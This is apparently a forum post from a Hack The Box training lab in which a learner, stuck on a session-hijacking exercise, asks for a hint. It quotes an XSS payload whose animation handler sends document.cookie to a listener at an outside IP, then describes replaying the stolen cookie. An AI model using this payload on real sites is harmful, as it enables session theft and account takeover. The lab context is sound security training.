I am stuck…
I have the field which is vulnerable and use the following script to gain a cookielog:
<style>@keyframes x{}</style><video style="animation-name:x" onanimationend="window.location = 'http://10.10.15.88:8000/log.php?c=' + document.cookie;"></video>
I think this was not necessary, plus it returns the cookie from the logged in user, not the admin.
Then I tried http://minilab.htb.net/submit-solution?url=IP:PORT and I got adminVisited, timestamp and success.
When I pick the cookie from this page, go to http://minilab.htb.net and insert that cookie in Storage on that page (Session Hijacking), it reverts back to the login screen… this is where I am stuck… Anybody willing to share a hint?